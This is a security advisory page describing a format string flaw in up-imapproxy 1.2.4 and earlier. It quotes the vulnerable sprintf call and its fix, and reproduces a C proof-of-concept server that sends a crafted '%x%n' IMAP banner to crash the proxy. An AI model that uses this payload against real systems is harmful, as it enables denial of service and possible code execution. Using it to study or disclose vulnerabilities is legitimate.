up-imapproxy Format String Vulnerability

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Home
Ask the Team
Mailing Lists
Advertising Info
Advisories
About SecuriTeam
Blogs

Brought to you by:

Suppliers of:

SecuriTeam in Your Inbox

New vulnerability?
New tool?
Tell us
(Our PGP key).

5% Off any SANS course
Use Code: SecuriTeam_5

Hack In Paris

La Nuit du Hack

Cyber Intelligence Europe 2013

Subjects of Interest:
Vulnerability Management
SQL Injection
Buffer Overflows
Active Network Scanning
Fuzzing
Fuzzer Report
Network Security
Network Scanner
Pen Testing
Security Scanner

up-imapproxy "proxies IMAP transactions between an IMAP client and an IMAP server". A format string vulnerability in up-imapproxy's handling of the response server's banner allows attackers to cause the program to execute arbitrary code.

Credit:
The information has been provided by Darkeagle.
The original article can be found at: http://exploiterz.org/adv/up-imapproxy.txt

Free Website Security Scan	Free Fuzzer Report	Vulnerability Assessment
Detect web app vulnerabilities	University study comparing the top	Accurate and automated scanning
Get guidance from professionals.	6 commercially availble fuzzers.	for networks of any size.

Protect your website!
Free Trial, Nothing to install.
No interruption of visitors.
www.beyondsecurity.com/vulnerability-scanner

Vulnerable Systems:
* up-imapproxy version 1.2.4 and prior

Vulnerable code:
/up-imapproxy-1.2.4/src/main.c

function: ParseBannerAndCapability();
static int ParseBannerAndCapability( char *DestBuf,
          unsigned int DestBufSize,
          char *SourceBuf,
          unsigned int SourceBufSize )
{
...
    SourceBuf[SourceBufSize - 2] = '\0';
    CP = strtok( SourceBuf, " " );
...
sprintf( DestBuf, CP );
...
}

This function uses in another function from main.c.

function: SetBannerAndCapability()

static void SetBannerAndCapability( void )
{
...
    BannerLen = ParseBannerAndCapability( Banner, sizeof Banner - 1,
       itd.ReadBuf, BytesRead );
...
    if ( strncasecmp( Banner, IMAP_UNTAGGED_OK, strlen(IMAP_UNTAGGED_OK)) )
    {
syslog(LOG_ERR, "%s: Unexpected response from imap server on initial connection: %s -- Exiting.", fn, Banner);
close( itd.conn->sd );
exit( 1 );
    }
...
}

As you can see ParseBannerAndCapability() function calls vulnerable sprintf() without format string. A correct call would be of the sorts of:
sprintf( DestBuf, "%s", CP );

Instead
sprintf( DestBuf, CP );

Vulnerability can be used to execute arbitary code on target's machine. Imapproxy incorrectly parse banner from IMAP daemon. Look at below PoC code.

Proof of Concept:
/*
PoC exploit code for up-imapproxy <= 1.2.4
by Darkeagle from ExploiterZ Labs

eagle [ at ] exploiterz [ dot ] org

an exploit binds port (143) and when imapproxy connects to this exploit-server and gets banner, it's child process crashes..

*/

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>

#define BANNER "AAAAAAAAAA%x%x%x%x%x%n%n%n\r\n\r\n"

int main ( int argc, char *argv[] )
{
struct sockaddr_in addr, cl_addr;
int sock, cl_sock, addr_size;
char *Iaddr;
socklen_t l;

printf("Imapproxy <= 1.2.4 PoC Exploit\n");

sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);

addr.sin_family = AF_INET;
addr.sin_port = htons(143);
addr.sin_addr.s_addr = inet_addr("127.0.0.1");

bind(sock, (struct sockaddr*)&addr, sizeof(addr));
listen(sock, 5);

addr_size = sizeof(addr);

while (1)
{
cl_sock = accept(sock, (struct sockaddr*)&cl_addr, &l);
Iaddr = inet_ntoa(cl_addr.sin_addr);
send(cl_sock, BANNER, strlen(BANNER), 0);
printf("IP: %s\n", Iaddr);
}

return 0;

}

blog comments powered by Disqus

	'ProFTPD Response Pool Use-After-Free Code Execution Vulnerability'
	'Insight Control for Linux Multiple Vulnerabilities'
	'HP-UX Running NFS/ONCplus Denial of Service Vulnerability'
	'HP-UX Running BIND Denial of Service Vulnerability 2011'
	'HP-UX Running XNTP Denial of Service Vulnerability'
	'HP-UX Denial of Service Vulnerability'
	'Webkit Detached Body Element Code Execution Vulnerability'
	'Mac OS X Compact Font Format Decoder Code Execution Vulnerability'
	'WebKit WBR Tag Removal Code Execution Vulnerability'
	'Webkit Undefined DOM Prototype Attach Code Execution Vulnerability'
	'Apple HFS Information Disclosure Vulnerability'
	'XPDF arbitrary Arbitrary Code Execution Vulnerabilities'
	'Hewlett-Packard Data Protector Client EXEC_CMD omni_chk_ds.sh Code Execution Vulnerability'
	'Red Hat OpenJDK IcedTea6 ClassLoader Code Execution Vulnerability'
	'HP-UX Apache Running Tomcat Servlet Engine Remote Modification and Denial of Service Vulnerabilities'
	'Apple Webkit WholeText Integer Overflow Code Execution Vulnerability'
	'HP-UX Running OpenSSL Execution of Arbitrary Code and Denial of Service Vulnerabilities'
	'HP-UX CIFS Server execution of Arbitrary Code and Denial of Service Vulnerabilities'
	'HP-UX Running Threaded Processes Denial of Service Vulnerability'
	'HP-UX Apache-based Web Server Multiple Vulnerabilities'